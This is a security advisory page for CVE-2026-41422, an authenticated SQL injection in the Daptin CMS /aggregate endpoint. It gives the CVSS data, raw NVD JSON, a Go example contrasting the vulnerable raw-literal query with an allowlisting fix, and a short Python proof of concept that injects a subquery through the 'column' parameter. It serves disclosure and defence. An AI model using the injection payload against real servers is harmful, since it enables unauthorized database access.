Security Vulnerability Report
CVE-2026-41422 CVSS 8.3 HIGH

CVE-2026-41422

Published: 2026-05-07 15:16:07
Last Modified: 2026-05-07 15:47:47

Description

Daptin is a GraphQL/JSON-API headless CMS. Prior to version 0.11.4, the /aggregate/:typename endpoint accepted column and group query parameters that were passed verbatim to goqu.L() — a raw SQL literal expression builder — without any validation. This bypassed all parameterization and allowed authenticated users with any valid session to inject arbitrary SQL expressions. This issue has been patched in version 0.11.4. The record classifies the weakness as CWE-89 (SQL injection); the CVSS vector's PR:L reflects that any low-privilege authenticated session suffices to reach the endpoint.
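The mechanism above, as an added Go example that is not Daptin's code and not the patch shipped in 0.11.4: `vulnerableSelect` reproduces the pre-fix shape of the bug, with `fmt.Sprintf` standing in for `goqu.L()`, which likewise emits its string argument as a raw SQL literal. `safeSelect` is one allowlisting approach to the same endpoint: every column and group term is checked against a per-table column list and a closed set of aggregate functions before it is rendered as a quoted identifier, so user text never reaches the query as SQL. The `users` schema, the function allowlist and the payload are constructed for the example.

```go
package main

import (
	"fmt"
	"regexp"
	"strings"
)

// schemaColumns is a constructed stand-in for the table schema a CMS would
// consult; only these names may ever reach the query as identifiers.
var schemaColumns = map[string]map[string]bool{
	"users": {"id": true, "email": true, "status": true, "created_at": true},
}

// allowedFuncs is the closed set of aggregate functions the endpoint may emit.
var allowedFuncs = map[string]bool{"count": true, "sum": true, "avg": true, "min": true, "max": true}

var (
	identRe = regexp.MustCompile(`^[a-z_][a-z0-9_]*$`)                // bare identifier
	funcRe  = regexp.MustCompile(`^([a-z]+)\((\*|[a-z_][a-z0-9_]*)\)$`) // func(col) or count(*)
)

// vulnerableSelect reproduces the pre-0.11.4 shape of the bug: the raw query
// parameters are spliced into the statement as SQL literals. fmt.Sprintf here
// stands in for goqu.L(), which also emits its argument verbatim.
func vulnerableSelect(table, column, group string) string {
	sql := fmt.Sprintf("SELECT %s FROM %s", column, table)
	if group != "" {
		sql += " GROUP BY " + group
	}
	return sql
}

// quoteIdent double-quotes an identifier that identRe has already accepted,
// so it cannot contain quotes, spaces or punctuation.
func quoteIdent(s string) string { return `"` + s + `"` }

// validateColumnTerm turns one comma-separated term of the column parameter
// into SQL, accepting only a known column or allowed_func(known column).
func validateColumnTerm(cols map[string]bool, term string) (string, error) {
	term = strings.ToLower(strings.TrimSpace(term))
	if identRe.MatchString(term) {
		if !cols[term] {
			return "", fmt.Errorf("unknown column %q", term)
		}
		return quoteIdent(term), nil
	}
	m := funcRe.FindStringSubmatch(term)
	if m == nil {
		return "", fmt.Errorf("rejected expression %q", term)
	}
	fn, arg := m[1], m[2]
	if !allowedFuncs[fn] {
		return "", fmt.Errorf("function %q not allowed", fn)
	}
	if arg == "*" {
		if fn != "count" {
			return "", fmt.Errorf("%s(*) not allowed", fn)
		}
		return "COUNT(*)", nil
	}
	if !cols[arg] {
		return "", fmt.Errorf("unknown column %q", arg)
	}
	return strings.ToUpper(fn) + "(" + quoteIdent(arg) + ")", nil
}

// safeSelect is the allowlisted alternative: every term is validated against
// the schema before it is rendered, so no user text is ever treated as SQL.
func safeSelect(table, column, group string) (string, error) {
	cols, ok := schemaColumns[table]
	if !ok {
		return "", fmt.Errorf("unknown table %q", table)
	}
	var selects []string
	for _, t := range strings.Split(column, ",") {
		s, err := validateColumnTerm(cols, t)
		if err != nil {
			return "", err
		}
		selects = append(selects, s)
	}
	sql := "SELECT " + strings.Join(selects, ", ") + " FROM " + quoteIdent(table)
	if group != "" {
		var groups []string
		for _, g := range strings.Split(group, ",") {
			g = strings.ToLower(strings.TrimSpace(g))
			if !identRe.MatchString(g) || !cols[g] {
				return "", fmt.Errorf("rejected group column %q", g)
			}
			groups = append(groups, quoteIdent(g))
		}
		sql += " GROUP BY " + strings.Join(groups, ", ")
	}
	return sql, nil
}

func main() {
	// Constructed payload of the kind the advisory describes: a subquery
	// smuggled in through the column parameter.
	payload := "1,(SELECT version())"
	fmt.Println("vulnerable:", vulnerableSelect("users", payload, ""))
	if _, err := safeSelect("users", payload, ""); err != nil {
		fmt.Println("hardened:   rejected:", err)
	}
	sql, _ := safeSelect("users", "count(*),status", "status")
	fmt.Println("hardened:  ", sql)
}
```

The design point is that the hardened path never has a "raw literal" branch at all: a term is either a schema column, an allowed function applied to a schema column, or an error. Widening that grammar (arithmetic, aliases, nested calls) is where injection bugs creep back in, so each extension should be validated the same way rather than handed to an `L()`-style builder.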

CVSS Details

CVSS Score
8.3
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L

Configurations (Affected Products)

No CPE configuration data is published for this entry. Affected versions per the description:

Daptin < 0.11.4 (fixed in 0.11.4)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests

# PoC for CVE-2026-41422
# Target: Daptin < 0.11.4
# Description: SQL injection via the /aggregate/:typename endpoint

target_url = "http://target-domain.com/aggregate/users"

# Malicious payload injected through the 'column' parameter, which the
# vulnerable versions hand to goqu.L() as a raw SQL literal.
# Example: attempt to have the database return its version string.
payload = "1,(SELECT version())"
params = {"column": payload}

# Authentication is required (PR:L): any valid low-privilege session will do.
# Placeholder cookie name and value; substitute the real session credential.
cookies = {"session": "valid_low_privilege_session_cookie"}

try:
    response = requests.get(target_url, params=params, cookies=cookies, timeout=10)
    if response.status_code == 200:
        print("[+] Request sent successfully. Check response for SQL output.")
        print(response.text)
    else:
        print(f"[-] Request failed with HTTP {response.status_code}")
except Exception as e:
    print(f"[!] Error: {e}")
```

References

https://github.com/daptin/daptin/releases/tag/v0.11.4
https://github.com/daptin/daptin/security/advisories/GHSA-rw2c-8rfq-gwfv

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2026-41422",
    "sourceIdentifier": "[email protected]",
    "published": "2026-05-07T15:16:06.813",
    "lastModified": "2026-05-07T15:47:46.853",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Daptin is a GraphQL/JSON-API headless CMS. Prior to version 0.11.4, the /aggregate/:typename endpoint accepted column and group query parameters that were passed verbatim to goqu.L() — a raw SQL literal expression builder — without any validation. This bypassed all parameterization and allowed authenticated users with any valid session to inject arbitrary SQL expressions. This issue has been patched in version 0.11.4."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L",
            "baseScore": 8.3,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "LOW"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 5.5
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-89"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/daptin/daptin/releases/tag/v0.11.4",
        "source": "[email protected]"
      },
      {
        "url": "https://github.com/daptin/daptin/security/advisories/GHSA-rw2c-8rfq-gwfv",
        "source": "[email protected]"
      }
    ]
  }
}
```